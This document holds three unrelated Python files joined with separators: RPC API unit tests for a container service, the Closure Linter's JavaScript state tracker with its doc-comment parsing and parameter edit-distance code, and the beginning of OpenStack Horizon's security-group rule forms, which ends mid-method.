def test_container_delete(self):
self._test_rpcapi('container_delete',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_show(self):
self._test_rpcapi('container_show',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_reboot(self):
self._test_rpcapi('container_reboot',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_stop(self):
self._test_rpcapi('container_stop',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_start(self):
self._test_rpcapi('container_start',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_pause(self):
self._test_rpcapi('container_pause',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_unpause(self):
self._test_rpcapi('container_unpause',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_logs(self):
self._test_rpcapi('container_logs',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_exec(self):
self._test_rpcapi('container_exec',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'],
command=self.fake_container['command'])
def test_ping_conductor(self):
self._test_rpcapi('ping_conductor',
'call',
rpcapi_cls=conductor_rpcapi.ListenerAPI,
version='1.0')
def test_x509keypair_create(self):
self._test_rpcapi('x509keypair_create',
'call',
version='1.0',
x509keypair=self.fake_x509keypair)
def test_x509keypair_delete(self):
self._test_rpcapi('x509keypair_delete',
'call',
version='1.0',
uuid=self.fake_x509keypair['uuid'])
self._test_rpcapi('x509keypair_delete',
'call',
version='1.1',
uuid=self.fake_x509keypair['name'])
| |
#!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Light weight EcmaScript state tracker that reads tokens and tracks state."""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)')
import re
from closure_linter import javascripttokenizer
from closure_linter import javascripttokens
from closure_linter import tokenutil
# Shorthand
Type = javascripttokens.JavaScriptTokenType
class DocFlag(object):
"""Generic doc flag object.
Attributes:
flag_type: param, return, define, type, etc.
flag_token: The flag token.
type_start_token: The first token specifying the flag type,
including braces.
type_end_token: The last token specifying the flag type,
including braces.
type: The type spec.
name_token: The token specifying the flag name.
name: The flag name.
description_start_token: The first token in the description.
description_end_token: The end token in the description.
description: The description.
"""
# Please keep these lists alphabetized.
# The list of standard jsdoc tags is from
STANDARD_DOC = frozenset([
'author',
'bug',
'const',
'constructor',
'define',
'deprecated',
'enum',
'export',
'extends',
'externs',
'fileoverview',
'implements',
'implicitCast',
'interface',
'lends',
'license',
'noalias',
'nocompile',
'nosideeffects',
'override',
'owner',
'param',
'preserve',
'private',
'return',
'see',
'supported',
'template',
'this',
'type',
'typedef',
])
ANNOTATION = frozenset(['preserveTry', 'suppress'])
LEGAL_DOC = STANDARD_DOC | ANNOTATION
# Includes all Closure Compiler @suppress types.
# Not all of these annotations are interpreted by Closure Linter.
#
# Specific cases:
# - accessControls is supported by the compiler at the expression
# and method level to suppress warnings about private/protected
# access (method level applies to all references in the method).
# The linter mimics the compiler behavior.
SUPPRESS_TYPES = frozenset([
'accessControls',
'ambiguousFunctionDecl',
'checkRegExp',
'checkTypes',
'checkVars',
'const',
'constantProperty',
'deprecated',
'duplicate',
'es5Strict',
'externsValidation',
'extraProvide',
'extraRequire',
'fileoverviewTags',
'globalThis',
'internetExplorerChecks',
'invalidCasts',
'missingProperties',
'missingProvide',
'missingRequire',
'nonStandardJsDocs',
'strictModuleDepCheck',
'tweakValidation',
'typeInvalidation',
'undefinedVars',
'underscore',
'unknownDefines',
'uselessCode',
'visibility',
'with'])
HAS_DESCRIPTION = frozenset([
'define', 'deprecated', 'desc', 'fileoverview', 'license', 'param',
'preserve', 'return', 'supported'])
HAS_TYPE = frozenset([
'define', 'enum', 'extends', 'implements', 'param', 'return', 'type',
'suppress'])
TYPE_ONLY = frozenset(['enum', 'extends', 'implements', 'suppress', 'type'])
HAS_NAME = frozenset(['param'])
EMPTY_COMMENT_LINE = re.compile(r'^\s*\*?\s*$')
EMPTY_STRING = re.compile(r'^\s*$')
def __init__(self, flag_token):
"""Creates the DocFlag object and attaches it to the given start token.
Args:
flag_token: The starting token of the flag.
"""
self.flag_token = flag_token
self.flag_type = flag_token.string.strip().lstrip('@')
# Extract type, if applicable.
self.type = None
self.type_start_token = None
self.type_end_token = None
if self.flag_type in self.HAS_TYPE:
brace = tokenutil.SearchUntil(flag_token, [Type.DOC_START_BRACE],
Type.FLAG_ENDING_TYPES)
if brace:
end_token, contents = _GetMatchingEndBraceAndContents(brace)
self.type = contents
self.type_start_token = brace
self.type_end_token = end_token
elif (self.flag_type in self.TYPE_ONLY and
flag_token.next.type not in Type.FLAG_ENDING_TYPES):
self.type_start_token = flag_token.next
self.type_end_token, self.type = _GetEndTokenAndContents(
self.type_start_token)
if self.type is not None:
self.type = self.type.strip()
# Extract name, if applicable.
self.name_token = None
self.name = None
if self.flag_type in self.HAS_NAME:
# Handle bad case, name could be immediately after flag token.
self.name_token = _GetNextIdentifierToken(flag_token)
# Handle good case, if found token is after type start, look for
# identifier after type end, since types contain identifiers.
if (self.type and self.name_token and
tokenutil.Compare(self.name_token, self.type_start_token) > 0):
self.name_token = _GetNextIdentifierToken(self.type_end_token)
if self.name_token:
self.name = self.name_token.string
# Extract description, if applicable.
self.description_start_token = None
self.description_end_token = None
self.description = None
if self.flag_type in self.HAS_DESCRIPTION:
search_start_token = flag_token
if self.name_token and self.type_end_token:
if tokenutil.Compare(self.type_end_token, self.name_token) > 0:
search_start_token = self.type_end_token
else:
search_start_token = self.name_token
elif self.name_token:
search_start_token = self.name_token
elif self.type:
search_start_token = self.type_end_token
interesting_token = tokenutil.Search(search_start_token,
Type.FLAG_DESCRIPTION_TYPES | Type.FLAG_ENDING_TYPES)
if interesting_token.type in Type.FLAG_DESCRIPTION_TYPES:
self.description_start_token = interesting_token
self.description_end_token, self.description = (
_GetEndTokenAndContents(interesting_token))
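# A worked example (illustrative): given the doc flag
#     @param {string} name The name to use.
# the resulting DocFlag has flag_type 'param', type 'string', name 'name',
# and description 'The name to use.'.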
class DocComment(object):
"""JavaScript doc comment object.
Attributes:
ordered_params: Ordered list of parameters documented.
start_token: The token that starts the doc comment.
end_token: The token that ends the doc comment.
suppressions: Map of suppression type to the token that added it.
"""
def __init__(self, start_token):
"""Create the doc comment object.
Args:
start_token: The first token in the doc comment.
"""
self.__params = {}
self.ordered_params = []
self.__flags = {}
self.start_token = start_token
self.end_token = None
self.suppressions = {}
self.invalidated = False
def Invalidate(self):
"""Indicate that the JSDoc is well-formed but we had problems parsing it.
This is a short-circuiting mechanism so that we don't emit false
positives about well-formed doc comments just because we don't support
hot new syntaxes.
"""
self.invalidated = True
def IsInvalidated(self):
"""Test whether Invalidate() has been called."""
return self.invalidated
def AddParam(self, name, param_type):
"""Add a new documented parameter.
Args:
name: The name of the parameter to document.
param_type: The parameter's declared JavaScript type.
"""
self.ordered_params.append(name)
self.__params[name] = param_type
def AddSuppression(self, token):
"""Add a new error suppression flag.
Args:
token: The suppression flag token.
"""
#TODO(user): Error if no braces
brace = tokenutil.SearchUntil(token, [Type.DOC_START_BRACE],
[Type.DOC_FLAG])
if brace:
end_token, contents = _GetMatchingEndBraceAndContents(brace)
for suppression in contents.split('|'):
self.suppressions[suppression] = token
def SuppressionOnly(self):
"""Returns whether this comment contains only suppression flags."""
for flag_type in self.__flags.keys():
if flag_type != 'suppress':
return False
return True
def AddFlag(self, flag):
"""Add a new document flag.
Args:
flag: DocFlag object.
"""
self.__flags[flag.flag_type] = flag
def InheritsDocumentation(self):
"""Test if the jsdoc implies documentation inheritance.
Returns:
True if documentation may be pulled off the superclass.
"""
return self.HasFlag('inheritDoc') or self.HasFlag('override')
def HasFlag(self, flag_type):
"""Test if the given flag has been set.
Args:
flag_type: The type of the flag to check.
Returns:
True if the flag is set.
"""
return flag_type in self.__flags
def GetFlag(self, flag_type):
"""Gets the last flag of the given type.
Args:
flag_type: The type of the flag to get.
Returns:
The last instance of the given flag type in this doc comment.
"""
return self.__flags[flag_type]
def CompareParameters(self, params):
"""Computes the edit distance and list from the function params to the docs.
Uses the Levenshtein edit distance algorithm, with code modified from
http://en.wikibooks.org/wiki/Algorithm_implementation/Strings/Levenshtein_distance#Python
Args:
params: The parameter list for the function declaration.
Returns:
The edit distance, the edit list.
"""
source_len, target_len = len(self.ordered_params), len(params)
edit_lists = [[]]
distance = [[]]
for i in range(target_len+1):
edit_lists[0].append(['I'] * i)
distance[0].append(i)
for j in range(1, source_len+1):
edit_lists.append([['D'] * j])
distance.append([j])
for i in range(source_len):
for j in range(target_len):
cost = 1
if self.ordered_params[i] == params[j]:
cost = 0
deletion = distance[i][j+1] + 1
insertion = distance[i+1][j] + 1
substitution = distance[i][j] + cost
edit_list = None
best = None
if deletion <= insertion and deletion <= substitution:
# Deletion is best.
best = deletion
edit_list = list(edit_lists[i][j+1])
edit_list.append('D')
elif insertion <= substitution:
# Insertion is best.
best = insertion
edit_list = list(edit_lists[i+1][j])
edit_list.append('I')
edit_lists[i+1].append(edit_list)
else:
# Substitution is best.
best = substitution
edit_list = list(edit_lists[i][j])
if cost:
edit_list.append('S')
else:
edit_list.append('=')
edit_lists[i+1].append(edit_list)
distance[i+1].append(best)
return distance[source_len][target_len], edit_lists[source_len][target_len]
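# A worked example (illustrative): with documented params ['a', 'b'] and
# declared params ['a', 'c'], CompareParameters returns distance 1 and the
# edit list ['=', 'S'] -- 'a' matches and 'b' is substituted by 'c'.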
def __repr__(self):
"""Returns a string representation of this object.
Returns:
A string representation of this object.
"""
return '<DocComment: %s, %s>' % (str(self.__params), str(self.__flags))
#
# Helper methods used by DocFlag and DocComment to parse out flag information.
#
def _GetMatchingEndBraceAndContents(start_brace):
"""Returns the matching end brace and contents between the two braces.
If any FLAG_ENDING_TYPE token is encountered before a matching end brace, then
that token is used as the matching ending token. Contents will have all
comment prefixes stripped out of them, and all comment prefixes in between the
start and end tokens will be split out into separate DOC_PREFIX tokens.
Args:
start_brace: The DOC_START_BRACE token immediately before desired contents.
Returns:
The matching ending token (DOC_END_BRACE or FLAG_ENDING_TYPE) and a string
of the contents between the matching tokens, minus any comment prefixes.
"""
open_count = 1
close_count = 0
contents = []
# We don't consider the start brace part of the type string.
token = start_brace.next
while open_count != close_count:
if token.type == Type.DOC_START_BRACE:
open_count += 1
elif token.type == Type.DOC_END_BRACE:
close_count += 1
if token.type != Type.DOC_PREFIX:
contents.append(token.string)
if token.type in Type.FLAG_ENDING_TYPES:
break
token = token.next
#Don't include the end token (end brace, end doc comment, etc.) in type.
token = token.previous
contents = contents[:-1]
return token, ''.join(contents)
def _GetNextIdentifierToken(start_token):
"""Searches for and returns the first identifier at the beginning of a token.
Searches each token after the start to see if it starts with an identifier.
If found, will split the token into at most 3 pieces: leading whitespace,
identifier, rest of token, returning the identifier token. If no identifier is
found returns None and changes no tokens. Search is abandoned when a
FLAG_ENDING_TYPE token is found.
Args:
start_token: The token to start searching after.
Returns:
The identifier token if found, None otherwise.
"""
token = start_token.next
while token and not token.type in Type.FLAG_ENDING_TYPES:
match = javascripttokenizer.JavaScriptTokenizer.IDENTIFIER.match(
token.string)
if (match is not None and token.type == Type.COMMENT and
len(token.string) == len(match.group(0))):
return token
token = token.next
return None
def _GetEndTokenAndContents(start_token):
"""Returns last content token and all contents before FLAG_ENDING_TYPE token.
Comment prefixes are split into DOC_PREFIX tokens and stripped from the
returned contents.
Args:
start_token: The token immediately before the first content token.
Returns:
The last content token and a string of all contents including start and
end tokens, with comment prefixes stripped.
"""
iterator = start_token
last_line = iterator.line_number
last_token = None
contents = ''
doc_depth = 0
while not iterator.type in Type.FLAG_ENDING_TYPES or doc_depth > 0:
if (iterator.IsFirstInLine() and
DocFlag.EMPTY_COMMENT_LINE.match(iterator.line)):
# If we have a blank comment line, consider that an implicit
# ending of the description. This handles a case like:
#
# * @return {boolean} True
# *
# * Note: This is a sentence.
#
# The note is not part of the @return description, but there was
# no definitive ending token. Rather there was a line containing
# only a doc comment prefix or whitespace.
break
# b/2983692
# don't prematurely match against a @flag if inside a doc flag
# need to think about what is the correct behavior for unterminated
# inline doc flags
if (iterator.type == Type.DOC_START_BRACE and
iterator.next.type == Type.DOC_INLINE_FLAG):
doc_depth += 1
elif (iterator.type == Type.DOC_END_BRACE and
doc_depth > 0):
doc_depth -= 1
if iterator.type in Type.FLAG_DESCRIPTION_TYPES:
contents += iterator.string
last_token = iterator
iterator = iterator.next
if iterator.line_number != last_line:
contents += '\n'
last_line = iterator.line_number
end_token = last_token
if DocFlag.EMPTY_STRING.match(contents):
contents = None
else:
# Strip trailing newline.
contents = contents[:-1]
return end_token, contents
class Function(object):
"""Data about a JavaScript function.
Attributes:
block_depth: Block depth the function began at.
doc: The DocComment associated with the function.
has_return: If the function has a return value.
has_this: If the function references the 'this' object.
is_assigned: If the function is part of an assignment.
is_constructor: If the function is a constructor.
name: The name of the function, whether given in the function keyword or
as the lvalue the function is assigned to.
"""
def __init__(self, block_depth, is_assigned, doc, name):
self.block_depth = block_depth
self.is_assigned = is_assigned
self.is_constructor = doc and doc.HasFlag('constructor')
self.is_interface = doc and doc.HasFlag('interface')
self.has_return = False
self.has_throw = False
self.has_this = False
self.name = name
self.doc = doc
class StateTracker(object):
"""EcmaScript state tracker.
Tracks block depth, function names, etc. within an EcmaScript token stream.
"""
OBJECT_LITERAL = 'o'
CODE = 'c'
def __init__(self, doc_flag=DocFlag):
"""Initializes a JavaScript token stream state tracker.
Args:
doc_flag: An optional custom DocFlag used for validating
documentation flags.
"""
self._doc_flag = doc_flag
self.Reset()
def Reset(self):
"""Resets the state tracker to prepare for processing a new page."""
self._block_depth = 0
self._is_block_close = False
self._paren_depth = 0
self._functions = []
self._functions_by_name = {}
self._last_comment = None
self._doc_comment = None
self._cumulative_params = None
self._block_types = []
self._last_non_space_token = None
self._last_line = None
self._first_token = None
self._documented_identifiers = set()
def InFunction(self):
"""Returns true if the current token is within a function.
Returns:
True if the current token is within a function.
"""
return bool(self._functions)
def InConstructor(self):
"""Returns true if the current token is within a constructor.
Returns:
True if the current token is within a constructor.
"""
return self.InFunction() and self._functions[-1].is_constructor
def InInterfaceMethod(self):
"""Returns true if the current token is within an interface method.
Returns:
True if the current token is within an interface method.
"""
if self.InFunction():
if self._functions[-1].is_interface:
return True
else:
name = self._functions[-1].name
prototype_index = name.find('.prototype.')
if prototype_index != -1:
class_function_name = name[0:prototype_index]
if (class_function_name in self._functions_by_name and
self._functions_by_name[class_function_name].is_interface):
return True
return False
def InTopLevelFunction(self):
"""Returns true if the current token is within a top level function.
Returns:
True if the current token is within a top level function.
"""
return len(self._functions) == 1 and self.InTopLevel()
def InAssignedFunction(self):
"""Returns true if the current token is within a function variable.
Returns:
True if the current token is within a function variable.
"""
return self.InFunction() and self._functions[-1].is_assigned
def IsFunctionOpen(self):
"""Returns true if the current token is a function block open.
Returns:
True if the current token is a function block open.
"""
return (self._functions and
self._functions[-1].block_depth == self._block_depth - 1)
def IsFunctionClose(self):
"""Returns true if the current token is a function block close.
Returns:
True if the current token is a function block close.
"""
return (self._functions and
self._functions[-1].block_depth == self._block_depth)
def InBlock(self):
"""Returns true if the current token is within a block.
Returns:
True if the current token is within a block.
"""
return bool(self._block_depth)
def IsBlockClose(self):
"""Returns true if the current token is a block close.
Returns:
True if the current token is a block close.
"""
return self._is_block_close
def InObjectLiteral(self):
"""Returns true if the current token is within an object literal.
Returns:
True if the current token is within an object literal.
"""
return self._block_depth and self._block_types[-1] == self.OBJECT_LITERAL
def InObjectLiteralDescendant(self):
"""Returns true if the current token has an object literal ancestor.
Returns:
True if the current token has an object literal ancestor.
"""
return self.OBJECT_LITERAL in self._block_types
def InParentheses(self):
"""Returns true if the current token is within parentheses.
Returns:
True if the current token is within parentheses.
"""
return bool(self._paren_depth)
def InTopLevel(self):
"""Whether we are at the top level in the class.
This function call is language specific. In some languages like
JavaScript, a function is top level if it is not inside any parenthesis.
In languages such as ActionScript, a function is top level if it is directly
within a class.
"""
raise TypeError('Abstract method InTopLevel not implemented')
def GetBlockType(self, token):
"""Determine the block type given a START_BLOCK token.
Code blocks come after parameters, keywords like else, and closing parens.
Args:
token: The current token. Can be assumed to be type START_BLOCK.
Returns:
Code block type for current token.
"""
raise TypeError('Abstract method GetBlockType not implemented')
def GetParams(self):
"""Returns the accumulated input params as an array.
In some EcmaScript languages, input params are specified like
(param:Type, param2:Type2, ...)
in others they are specified just as
(param, param2)
We handle both formats for specifying parameters here and leave
it to the compilers for each language to detect compile errors.
This allows more code to be reused between lint checkers for various
EcmaScript languages.
Returns:
The accumulated input params as an array.
"""
params = []
if self._cumulative_params:
params = re.compile(r'\s+').sub('', self._cumulative_params).split(',')
# Strip out the type from parameters of the form name:Type.
params = map(lambda param: param.split(':')[0], params)
return params
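# A worked example (illustrative): with accumulated params 'a: Number, b',
# GetParams() strips whitespace and the ':Type' suffixes and returns
# ['a', 'b'].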
def GetLastComment(self):
"""Return the last plain comment that could be used as documentation.
Returns:
The last plain comment that could be used as documentation.
"""
return self._last_comment
def GetDocComment(self):
"""Return the most recent applicable documentation comment.
Returns:
The last applicable documentation comment.
"""
return self._doc_comment
def HasDocComment(self, identifier):
"""Returns whether the identifier has been documented yet.
Args:
identifier: The identifier.
Returns:
Whether the identifier has been documented yet.
"""
return identifier in self._documented_identifiers
def InDocComment(self):
"""Returns whether the current token is in a doc comment.
Returns:
Whether the current token is in a doc comment.
"""
return self._doc_comment and self._doc_comment.end_token is None
def GetDocFlag(self):
"""Returns the current documentation flags.
Returns:
The current documentation flags.
"""
return self._doc_flag
def IsTypeToken(self, t):
if self.InDocComment() and t.type not in (Type.START_DOC_COMMENT,
Type.DOC_FLAG, Type.DOC_INLINE_FLAG, Type.DOC_PREFIX):
f = tokenutil.SearchUntil(t, [Type.DOC_FLAG], [Type.START_DOC_COMMENT],
None, True)
if f and f.attached_object.type_start_token is not None:
return (tokenutil.Compare(t, f.attached_object.type_start_token) > 0 and
tokenutil.Compare(t, f.attached_object.type_end_token) < 0)
return False
def GetFunction(self):
"""Return the function the current code block is a part of.
Returns:
The current Function object.
"""
if self._functions:
return self._functions[-1]
def GetBlockDepth(self):
"""Return the block depth.
Returns:
The current block depth.
"""
return self._block_depth
def GetLastNonSpaceToken(self):
"""Return the last non whitespace token."""
return self._last_non_space_token
def GetLastLine(self):
"""Return the last line."""
return self._last_line
def GetFirstToken(self):
"""Return the very first token in the file."""
return self._first_token
def HandleToken(self, token, last_non_space_token):
"""Handles the given token and updates state.
Args:
token: The token to handle.
last_non_space_token: The last non-whitespace token processed before this token.
"""
self._is_block_close = False
if not self._first_token:
self._first_token = token
# Track block depth.
type = token.type
if type == Type.START_BLOCK:
self._block_depth += 1
# Subclasses need to handle block start very differently because
# whether a block is a CODE or OBJECT_LITERAL block varies significantly
# by language.
self._block_types.append(self.GetBlockType(token))
# Track block depth.
elif type == Type.END_BLOCK:
self._is_block_close = not self.InObjectLiteral()
self._block_depth -= 1
self._block_types.pop()
# Track parentheses depth.
elif type == Type.START_PAREN:
self._paren_depth += 1
# Track parentheses depth.
elif type == Type.END_PAREN:
self._paren_depth -= 1
elif type == Type.COMMENT:
self._last_comment = token.string
elif type == Type.START_DOC_COMMENT:
self._last_comment = None
self._doc_comment = DocComment(token)
elif type == Type.END_DOC_COMMENT:
self._doc_comment.end_token = token
elif type in (Type.DOC_FLAG, Type.DOC_INLINE_FLAG):
flag = self._doc_flag(token)
token.attached_object = flag
self._doc_comment.AddFlag(flag)
if flag.flag_type == 'param' and flag.name:
self._doc_comment.AddParam(flag.name, flag.type)
elif flag.flag_type == 'suppress':
self._doc_comment.AddSuppression(token)
elif type == Type.FUNCTION_DECLARATION:
last_code = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES, None,
True)
doc = None
# Only functions outside of parens are eligible for documentation.
if not self._paren_depth:
doc = self._doc_comment
name = ''
is_assigned = last_code and (last_code.IsOperator('=') or
last_code.IsOperator('||') or last_code.IsOperator('&&') or
(last_code.IsOperator(':') and not self.InObjectLiteral()))
if is_assigned:
# TODO(robbyw): This breaks for x[2] = ...
# Must use loop to find full function name in the case of line-wrapped
# declarations (bug 1220601) like:
# my.function.foo.
# bar = function() ...
identifier = tokenutil.Search(last_code, Type.SIMPLE_LVALUE, None, True)
while identifier and identifier.type in (
Type.IDENTIFIER, Type.SIMPLE_LVALUE):
name = identifier.string + name
# Traverse behind us, skipping whitespace and comments.
while True:
identifier = identifier.previous
if not identifier or not identifier.type in Type.NON_CODE_TYPES:
break
else:
next_token = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES)
while next_token and next_token.IsType(Type.FUNCTION_NAME):
name += next_token.string
next_token = tokenutil.Search(next_token, Type.FUNCTION_NAME, 2)
function = Function(self._block_depth, is_assigned, doc, name)
self._functions.append(function)
self._functions_by_name[name] = function
elif type == Type.START_PARAMETERS:
self._cumulative_params = ''
elif type == Type.PARAMETERS:
self._cumulative_params += token.string
elif type == Type.KEYWORD and token.string == 'return':
next_token = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES)
if not next_token.IsType(Type.SEMICOLON):
function = self.GetFunction()
if function:
function.has_return = True
elif type == Type.KEYWORD and token.string == 'throw':
function = self.GetFunction()
if function:
function.has_throw = True
elif type == Type.SIMPLE_LVALUE:
identifier = token.values['identifier']
jsdoc = self.GetDocComment()
if jsdoc:
self._documented_identifiers.add(identifier)
self._HandleIdentifier(identifier, True)
elif type == Type.IDENTIFIER:
self._HandleIdentifier(token.string, False)
# Detect documented non-assignments.
next_token = tokenutil.SearchExcept(token, Type.NON_CODE_TYPES)
if next_token.IsType(Type.SEMICOLON):
if (self._last_non_space_token and
self._last_non_space_token.IsType(Type.END_DOC_COMMENT)):
self._documented_identifiers.add(token.string)
def _HandleIdentifier(self, identifier, is_assignment):
"""Process the given identifier.
Currently checks if it references 'this' and annotates the function
accordingly.
Args:
identifier: The identifier to process.
is_assignment: Whether the identifier is being written to.
"""
if identifier == 'this' or identifier.startswith('this.'):
function = self.GetFunction()
if function:
function.has_this = True
def HandleAfterToken(self, token):
"""Handle updating state after a token has been checked.
This function should be used for destructive state changes such as
deleting a tracked object.
Args:
token: The token to handle.
"""
type = token.type
if type == Type.SEMICOLON or type == Type.END_PAREN or (
type == Type.END_BRACKET and
self._last_non_space_token.type not in (
Type.SINGLE_QUOTE_STRING_END, Type.DOUBLE_QUOTE_STRING_END)):
# We end on any numeric array index, but keep going for string based
# array indices so that we pick up manually exported identifiers.
self._doc_comment = None
self._last_comment = None
elif type == Type.END_BLOCK:
self._doc_comment = None
self._last_comment = None
if self.InFunction() and self.IsFunctionClose():
# TODO(robbyw): Detect the function's name for better errors.
self._functions.pop()
elif type == Type.END_PARAMETERS and self._doc_comment:
self._doc_comment = None
self._last_comment = None
if not token.IsAnyType(Type.WHITESPACE, Type.BLANK_LINE):
self._last_non_space_token = token
self._last_line = token.line
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import netaddr
from django.conf import settings # noqa
from django.core.urlresolvers import reverse # noqa
from django.core import validators
from django.forms import ValidationError # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon.utils import fields
from horizon.utils import validators as utils_validators
from openstack_dashboard import api
from openstack_dashboard.utils import filters
LOG = logging.getLogger(__name__)
class CreateGroup(forms.SelfHandlingForm):
name = forms.CharField(label=_("Name"),
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"))
def handle(self, request, data):
try:
sg = api.network.security_group_create(request,
data['name'],
data['description'])
messages.success(request,
_('Successfully created security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to create security group.'),
redirect=redirect)
class UpdateGroup(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
name = forms.CharField(label=_("Name"),
error_messages={
'required': _('This field is required.'),
'invalid': _("The string may only contain"
" ASCII characters and numbers.")},
validators=[validators.validate_slug])
description = forms.CharField(label=_("Description"))
def handle(self, request, data):
try:
sg = api.network.security_group_update(request,
data['id'],
data['name'],
data['description'])
messages.success(request,
_('Successfully updated security group: %s')
% data['name'])
return sg
except Exception:
redirect = reverse("horizon:project:access_and_security:index")
exceptions.handle(request,
_('Unable to update security group.'),
redirect=redirect)
class AddRule(forms.SelfHandlingForm):
id = forms.CharField(widget=forms.HiddenInput())
rule_menu = forms.ChoiceField(label=_('Rule'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'rule_menu'}))
# "direction" field is enabled only when custom mode.
# It is because most common rules in local_settings.py is meaningful
# when its direction is 'ingress'.
direction = forms.ChoiceField(
label=_('Direction'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Direction'),
'data-rule_menu-udp': _('Direction'),
'data-rule_menu-icmp': _('Direction'),
'data-rule_menu-custom': _('Direction'),
'data-rule_menu-all_tcp': _('Direction'),
'data-rule_menu-all_udp': _('Direction'),
'data-rule_menu-all_icmp': _('Direction'),
}))
ip_protocol = forms.IntegerField(
label=_('IP Protocol'), required=False,
help_text=_("Enter an integer value between 0 and 255 "
"(or -1 which means wildcard)."),
validators=[utils_validators.validate_ip_protocol],
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-custom': _('IP Protocol')}))
port_or_range = forms.ChoiceField(
label=_('Open Port'),
choices=[('port', _('Port')),
('range', _('Port Range'))],
widget=forms.Select(attrs={
'class': 'switchable switched',
'data-slug': 'range',
'data-switch-on': 'rule_menu',
'data-rule_menu-tcp': _('Open Port'),
'data-rule_menu-udp': _('Open Port')}))
port = forms.IntegerField(label=_("Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-port': _('Port')}),
validators=[
utils_validators.validate_port_range])
from_port = forms.IntegerField(label=_("From Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('From Port')}),
validators=[
utils_validators.validate_port_range])
to_port = forms.IntegerField(label=_("To Port"),
required=False,
help_text=_("Enter an integer value "
"between 1 and 65535."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'range',
'data-range-range': _('To Port')}),
validators=[
utils_validators.validate_port_range])
icmp_type = forms.IntegerField(label=_("Type"),
required=False,
help_text=_("Enter a value for ICMP type "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Type')}),
validators=[
utils_validators.validate_port_range])
icmp_code = forms.IntegerField(label=_("Code"),
required=False,
help_text=_("Enter a value for ICMP code "
"in the range (-1: 255)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'rule_menu',
'data-rule_menu-icmp': _('Code')}),
validators=[
utils_validators.validate_port_range])
remote = forms.ChoiceField(label=_('Remote'),
choices=[('cidr', _('CIDR')),
('sg', _('Security Group'))],
help_text=_('To specify an allowed IP '
'range, select "CIDR". To '
'allow access from all '
'members of another security '
'group select "Security '
'Group".'),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'remote'}))
cidr = fields.IPField(label=_("CIDR"),
required=False,
initial="0.0.0.0/0",
help_text=_("Classless Inter-Domain Routing "
"(e.g. 192.168.0.0/24)"),
version=fields.IPv4 | fields.IPv6,
mask=True,
widget=forms.TextInput(
attrs={'class': 'switched',
'data-switch-on': 'remote',
'data-remote-cidr': _('CIDR')}))
security_group = forms.ChoiceField(label=_('Security Group'),
required=False,
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'remote',
'data-remote-sg': _('Security '
'Group')}))
# When cidr is used, ethertype is determined from the IP version of the cidr.
# When a source group is used, ethertype needs to be specified explicitly.
ethertype = forms.ChoiceField(label=_('Ether Type'),
required=False,
choices=[('IPv4', _('IPv4')),
('IPv6', _('IPv6'))],
widget=forms.Select(attrs={
'class': 'switched',
'data-slug': 'ethertype',
'data-switch-on': 'remote',
'data-remote-sg': _('Ether Type')}))
def __init__(self, *args, **kwargs):
sg_list = kwargs.pop('sg_list', [])
super(AddRule, self).__init__(*args, **kwargs)
# Determine if there are security groups available for the
# remote group option; add the choices and enable the option if so.
if sg_list:
security_groups_choices = sg_list
else:
security_groups_choices = [("", _("No security groups available"))]
self.fields['security_group'].choices = security_groups_choices
backend = api.network.security_group_backend(self.request)
rules_dict = getattr(settings, 'SECURITY_GROUP_RULES', [])
common_rules = [(k, _(rules_dict[k]['name']))
